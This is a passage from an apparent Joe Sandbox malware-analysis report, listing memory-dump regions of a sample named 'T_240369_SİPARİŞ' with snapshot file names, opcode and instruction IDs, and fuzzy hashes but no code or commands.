                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e702de6d03c3434f52bd1f655e979a5899a5e584ccbbc1c3a771aae5ffe62180
                                                                        • Instruction ID: 14a9e38ce2416863ad14bd9b695cca908e5d19fd994f6eec26b3cf1553c4f04d
                                                                        • Opcode Fuzzy Hash: e702de6d03c3434f52bd1f655e979a5899a5e584ccbbc1c3a771aae5ffe62180
                                                                        • Instruction Fuzzy Hash: 39018476B0011B9FCB00DF99D980AAEFBF6FF84214F208629D519A7750DB31A90AC7D0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 569cc0cdb28d1f75e86e671899f729e076deb119e0ddb4354cc6e475a719b085
                                                                        • Instruction ID: 484407ae10541ad522af99186df97773f1b9c50a9a54851b2a1f5181971882e4
                                                                        • Opcode Fuzzy Hash: 569cc0cdb28d1f75e86e671899f729e076deb119e0ddb4354cc6e475a719b085
                                                                        • Instruction Fuzzy Hash: 85F02B327001096BCB24A719C854AAEF7BAFF84360F158066FD19DB3A1DE34AD0787D1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 43cc22d05cff18d305db8c49d40d76c5eb52bbb3c203bc2adf556b8aeb656e0f
                                                                        • Instruction ID: f6cfaf1d9db2678f64156b90ed243d24adbf51be0b3572f9b0a1511f655330da
                                                                        • Opcode Fuzzy Hash: 43cc22d05cff18d305db8c49d40d76c5eb52bbb3c203bc2adf556b8aeb656e0f
                                                                        • Instruction Fuzzy Hash: 3801A436B012249FCB14AB64D869BAEB776EBC8711F20412AE516A7380DB759D12C790
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4091894eb03264794e35bb46edbb00492a09ba2c97fc523dbc54e3154bba98ff
                                                                        • Instruction ID: 64e60548f3ae0d4cb4bc8d4e631656b3bca5e6ea001ceace5836f8ad052f9e86
                                                                        • Opcode Fuzzy Hash: 4091894eb03264794e35bb46edbb00492a09ba2c97fc523dbc54e3154bba98ff
                                                                        • Instruction Fuzzy Hash: F1F0E92330D1D25BC721222C1C60B9AEEB9AFC6514F4504BEF859C7247C415DD45C7A0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649369753.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5b70000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5f8fa8acd086b8fde02f120767970f84a89bd7ef58159f05c58d206698b4bc02
                                                                        • Instruction ID: bff837386b3cf8ad20578ee19b86b69dfe88b8ce42d3b5da64e6953d05c505ab
                                                                        • Opcode Fuzzy Hash: 5f8fa8acd086b8fde02f120767970f84a89bd7ef58159f05c58d206698b4bc02
                                                                        • Instruction Fuzzy Hash: 96F07830A4E10CDFC304EBF4C50069D3BB1EB46300F0444E9D829973A1DA325E05D781
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649183304.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5b40000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2027a5fa46d75f25671ea6556e898144ff3073669b31d7cfc0eebe82d386081d
                                                                        • Instruction ID: 68abcd299772f3a7b3a4c80327c09c221a206b3af57c27007c0c1abd78f11d19
                                                                        • Opcode Fuzzy Hash: 2027a5fa46d75f25671ea6556e898144ff3073669b31d7cfc0eebe82d386081d
                                                                        • Instruction Fuzzy Hash: 30113A74A01228CFDB50DF64D959799BBF1FB8C301F1040AAD909A7384DB346E84CF50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1636454530.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2f60000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bcba4e3e79cffe36f9afe020d0036f21fe4781397be3b93a0f5318a8304b1892
                                                                        • Instruction ID: 21c8bfec6817dc60e868f5c35feaba2231b0f606ce38f77c74c29ffae9ec0d0a
                                                                        • Opcode Fuzzy Hash: bcba4e3e79cffe36f9afe020d0036f21fe4781397be3b93a0f5318a8304b1892
                                                                        • Instruction Fuzzy Hash: E0010879E04109CFEB14CB89D15C7BBB7B3EB90395F048166D21D8A358D7B8A98ACF41
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a95764a2a3a3c115869d5942992dd51664b4cf4b320b9f1de801929a8a77c05b
                                                                        • Instruction ID: 34ec34851044388193208f7e93a1356a88de37822e8cd4e649735005f06bbe8f
                                                                        • Opcode Fuzzy Hash: a95764a2a3a3c115869d5942992dd51664b4cf4b320b9f1de801929a8a77c05b
                                                                        • Instruction Fuzzy Hash: C0013C353006189FC309AB25D16892EBBE2FBCC711B208568F90A8B794CF75ED42CBD5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1636454530.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2f60000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 53a1b1df0d7a40648ad3cf503d2e5c5924779b698a403fb65f4a79a895a71346
                                                                        • Instruction ID: e5345e99f9da63dad3fc78145c325f3c758dce844ece9aa0ebe54ed5390c0357
                                                                        • Opcode Fuzzy Hash: 53a1b1df0d7a40648ad3cf503d2e5c5924779b698a403fb65f4a79a895a71346
                                                                        • Instruction Fuzzy Hash: CEF03075F402144FCB14ABBCD51C81E3BEAAFCC26131104A5E50ACB368EE38DC428B90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 866906c6a6d09b2c5746d8618b8757e9fa7ffad39935fbaca63439de2031e0e7
                                                                        • Instruction ID: 3c5ad57ee914fa760a1b202a4957e3d96a8d7366f608b08cfe9623c1d8884e88
                                                                        • Opcode Fuzzy Hash: 866906c6a6d09b2c5746d8618b8757e9fa7ffad39935fbaca63439de2031e0e7
                                                                        • Instruction Fuzzy Hash: 12F0B4313045018FC715A739F6946D7BBF79B88304B168065E15ECB399EE30DC4B8794
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649369753.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5b70000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 79a52e7f298478044e575cb84e38b19f32b4e2f10cbaf0d1221633312c5fe8d8
                                                                        • Instruction ID: cafdeaee47c50a576f7ce10fff89a627738358bf4688700da928783c3d45ece3
                                                                        • Opcode Fuzzy Hash: 79a52e7f298478044e575cb84e38b19f32b4e2f10cbaf0d1221633312c5fe8d8
                                                                        • Instruction Fuzzy Hash: 75F02B3590D20CEFCB05EBA4D550AADBB78EF46300F1091DAD84967390EE315F05D781
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1636454530.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2f60000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b3ad51720b371d9a79c223318329a1dd83b9d7aa5835fcaf5708a0e6cf258e02
                                                                        • Instruction ID: 07c2ee3c79ee457401ecf727e80dd6f36c46b734d6c553e5da7d186298c0b6a1
                                                                        • Opcode Fuzzy Hash: b3ad51720b371d9a79c223318329a1dd83b9d7aa5835fcaf5708a0e6cf258e02
                                                                        • Instruction Fuzzy Hash: CCF05435B0411CDFDB18DB69E514BFA7BEAD788765F14407ADD08C3694EB319841C750
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1636454530.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2f60000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e0626ffb8a9b022f5aa0cea9f5ec0281163ff14061f3e070c3be48d250d0358b
                                                                        • Instruction ID: 9f66ed2a34384f747e07d72db212b0360f561270ad8da10b197754136094766b
                                                                        • Opcode Fuzzy Hash: e0626ffb8a9b022f5aa0cea9f5ec0281163ff14061f3e070c3be48d250d0358b
                                                                        • Instruction Fuzzy Hash: E0F08B30B402045FCB148BB968A4BBB3B93ABC0340F08806EE1098B382CA744901DF51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1650702212.0000000005E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5e60000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a4a35962efeeab4b4940ec6da0a7c66a9e0cce0cb826ae6858810bdee09baafa
                                                                        • Instruction ID: 1d924648461b4354ea2ffb9c94c3a7b654831e849d7867d70d40af3953c15391
                                                                        • Opcode Fuzzy Hash: a4a35962efeeab4b4940ec6da0a7c66a9e0cce0cb826ae6858810bdee09baafa
                                                                        • Instruction Fuzzy Hash: 85115B3094426ACFDB60DF58D858BADBBB5FB44384F0094E6D45AA7681DB341E84CF15
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649183304.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5b40000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cfd5393f2d154a521048c10e8dc0ce2f728a38595d1e7641b259024cadb01466
                                                                        • Instruction ID: 03e31b8aa21da019d5cbf9624d6ddf819de0324d07598d984962ea6301dde266
                                                                        • Opcode Fuzzy Hash: cfd5393f2d154a521048c10e8dc0ce2f728a38595d1e7641b259024cadb01466
                                                                        • Instruction Fuzzy Hash: AAF08CB0909208DFE724CF6DE8067EEB6BAFB8E300F00D469E41967290CF7069049F12
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4d25364fbe09d6bab4fd920491631a613339f1909277ec82c6b7509dc6384daa
                                                                        • Instruction ID: 4f415bcb4f5bd8c519cc9aaf0cb51ccb84f5f0ff3b7e17520acbd8a73cf4ebb9
                                                                        • Opcode Fuzzy Hash: 4d25364fbe09d6bab4fd920491631a613339f1909277ec82c6b7509dc6384daa
                                                                        • Instruction Fuzzy Hash: E7F062793003008FC306AB65D454E3A7BB6BF89711B1584AAF586CB3B1CA35EC01CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649183304.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5b40000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 892b4a3c246ba008285b72db967203ac1def5e5a018478a4ef4941eb48771355
                                                                        • Instruction ID: 835fba97e334b6b6e24ff79d67f2ebdda5099634cb39fa71b44196ec489c9934
                                                                        • Opcode Fuzzy Hash: 892b4a3c246ba008285b72db967203ac1def5e5a018478a4ef4941eb48771355
                                                                        • Instruction Fuzzy Hash: 0A01F6B1D06209EFCB54DFA8D9452ADBBF4FB09201F1044A9A40AA3250D7346A41DB51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bdd8410b880107885d7cf0ce2f7054a18d2c37308802dd47d4660007ab8349c0
                                                                        • Instruction ID: 7432078f884a2a81fa51582faab12f5ca1df5b4aab0b249d72194c058263adfa
                                                                        • Opcode Fuzzy Hash: bdd8410b880107885d7cf0ce2f7054a18d2c37308802dd47d4660007ab8349c0
                                                                        • Instruction Fuzzy Hash: 28F02732B002089BCB159A68D8149DBFBB5EB88221F10803BEC44E7300EA30DC108BE0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649183304.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5b40000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3283d00786064d31fe0480d02d8459577677feb28f21fec2aa4bd855cc618431
                                                                        • Instruction ID: 2145bf27ae6107ea2df2f9a7cd538953509fe1dbfbd272727482c2609e4caf0b
                                                                        • Opcode Fuzzy Hash: 3283d00786064d31fe0480d02d8459577677feb28f21fec2aa4bd855cc618431
                                                                        • Instruction Fuzzy Hash: 1DF0C470D05209DFCB94DFA8D5456AEBBF4FB09204F1045A9A81AA3250EB355A41DB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649183304.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5b40000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bd3ded17a4190bb1dc6f4c43951d4b5ed2518555d8b2e760ff9f68c8f0877ad6
                                                                        • Instruction ID: 3de07a58ce8ae9082363d241d574e5373b82a6efa6090e2a5341fff9280208fa
                                                                        • Opcode Fuzzy Hash: bd3ded17a4190bb1dc6f4c43951d4b5ed2518555d8b2e760ff9f68c8f0877ad6
                                                                        • Instruction Fuzzy Hash: F211C974A102288FCB65DF24D994A99BBF5BF8A300F4055E9E48AE7350DB705F85CF41
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1636454530.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2f60000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8ef3d4c976653e15ef1b095a4fa134f51ff626109e2399a116ec377860458c13
                                                                        • Instruction ID: 933bf72a54940980e28966e718c1e035cf8a02cb2aa7cfe0eabb8b6286efe907
                                                                        • Opcode Fuzzy Hash: 8ef3d4c976653e15ef1b095a4fa134f51ff626109e2399a116ec377860458c13
                                                                        • Instruction Fuzzy Hash: 7FF05C30B001146FDB1457B99858B7B3297FBC4750F048029E10DCB385DF704C019791
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9209d6307484791b985955b7836365667846d4e9af13dbc076899fd63ac28074
                                                                        • Instruction ID: fee0c2f8c2ee98301a5aa76c5e07ca251d362489201598634296c9347450a31f
                                                                        • Opcode Fuzzy Hash: 9209d6307484791b985955b7836365667846d4e9af13dbc076899fd63ac28074
                                                                        • Instruction Fuzzy Hash: ECF0657120D7814FC7036626B9601C33FF79BA674031B9197D195CF397DA24DC0A87A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1636454530.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2f60000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f74d116a0968170091fe018d207c7252e50d12d2b4002208b78137820a015058
                                                                        • Instruction ID: da607bff10919e158cec397c80fd4ede192b6a8ddd89a6696870996551df99a2
                                                                        • Opcode Fuzzy Hash: f74d116a0968170091fe018d207c7252e50d12d2b4002208b78137820a015058
                                                                        • Instruction Fuzzy Hash: 10F03C76A05318CFD704CF58D588BEDBBB6FB49340F108054910AAB292DB349D84CF40
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: dfe858ce10abda4c6b859ca09325abbfcd4885e6a0a4917d982b01521196cdb6
                                                                        • Instruction ID: 3c2280a49ae105930238fcac470b41de2e142b4e7b80b6621306a5b6af51e075
                                                                        • Opcode Fuzzy Hash: dfe858ce10abda4c6b859ca09325abbfcd4885e6a0a4917d982b01521196cdb6
                                                                        • Instruction Fuzzy Hash: 9BF05E393102049FC304EB1AD898D2A77AAFFC9721B1044A9F9468B3B0CA31EC02CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4b186a12fc4dcd6f12d1d31e867a9baed682a020c70d62cf95770954c1672eb8
                                                                        • Instruction ID: 9fc4b77277ca6d34ad1f445909ba32d8a1906c69fd11cdc3ec18a5143d759c26
                                                                        • Opcode Fuzzy Hash: 4b186a12fc4dcd6f12d1d31e867a9baed682a020c70d62cf95770954c1672eb8
                                                                        • Instruction Fuzzy Hash: 33F08932A04204AFD709DB64D8497CDBFF5EB44220F14C1A5F00793290DB745A81CB84
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649183304.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5b40000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 527960a302d60379aa060e0544b442fe7fddf1de705f218bc59a3592c5489f93
                                                                        • Instruction ID: 00f65a35273ff1fab85a011c24034e128f09445222af1511fe7bd72f72b767ce
                                                                        • Opcode Fuzzy Hash: 527960a302d60379aa060e0544b442fe7fddf1de705f218bc59a3592c5489f93
                                                                        • Instruction Fuzzy Hash: 52F08C75D44208EFCB68DFA8D8417ADBBF4EB08300F10C0A9E81493311C634AA51EF81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1650702212.0000000005E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5e60000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f166484b3f12c244f84fdd6b90cb9685fff923324820ab72455c404b43012bb7
                                                                        • Instruction ID: 3a883f07f6c126c4173f1107ab771a0a89901849fc1ecda870b6157af5e93852
                                                                        • Opcode Fuzzy Hash: f166484b3f12c244f84fdd6b90cb9685fff923324820ab72455c404b43012bb7
                                                                        • Instruction Fuzzy Hash: F101DA78A00229CFDB60DF54D999AE9BBB5FB48304F1080E6D91DA7390DB306E81DF50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1650702212.0000000005E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5e60000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3960ff32024f6851a25d0fd36d423fbf717ce397800a2d09c89c9da0197a63d1
                                                                        • Instruction ID: 580b26addb6ce1a8ddbfefc118f2f3330db58860a97e733cffa7768f60ed2a5c
                                                                        • Opcode Fuzzy Hash: 3960ff32024f6851a25d0fd36d423fbf717ce397800a2d09c89c9da0197a63d1
                                                                        • Instruction Fuzzy Hash: 9F01CC78910129CFCBA0DF54D848AA9BBB1FB48300F5081E6D949A7744DB346E81DF41
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649369753.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5b70000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 197d8f9bfc1082ff5ee37032186a8eeaecb9e7008ce83289cc398c5e26862665
                                                                        • Instruction ID: 899b822d88d45abfb336ece04887eabc4628b66661e6e55aed39622027eafe4c
                                                                        • Opcode Fuzzy Hash: 197d8f9bfc1082ff5ee37032186a8eeaecb9e7008ce83289cc398c5e26862665
                                                                        • Instruction Fuzzy Hash: F2E06D72B00B004BC764CA2DF45525BB3E2BFC4320718C92EE19AC3B44EA30F8418A40
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 626b83f1e3a201d97b12ba83ddadcb89986ae89787d05ad4f14db4879345b267
                                                                        • Instruction ID: 57d955e5a0b2a738109f59023b65423973314ed8b1b2a96dba9d916776858bdc
                                                                        • Opcode Fuzzy Hash: 626b83f1e3a201d97b12ba83ddadcb89986ae89787d05ad4f14db4879345b267
                                                                        • Instruction Fuzzy Hash: 87F027323083858FC7029729E95884AFF669FC1210304C93BE08AC726ADA70DC4D8360
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649369753.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5b70000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 45d8ea930a1941c029b5ef32a9039862cca28edd26d6bb24a64d7b1bedc87622
                                                                        • Instruction ID: 0e6210feb06c4a61a6e59f6d204952fd7233b8eafe8dcc48656d10a3f9eb1e3c
                                                                        • Opcode Fuzzy Hash: 45d8ea930a1941c029b5ef32a9039862cca28edd26d6bb24a64d7b1bedc87622
                                                                        • Instruction Fuzzy Hash: 11F08C3990820CEFCB01DF94EC40AA9BB76FB48310F1590A9E814173A1D632AA61EB51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649183304.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5b40000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
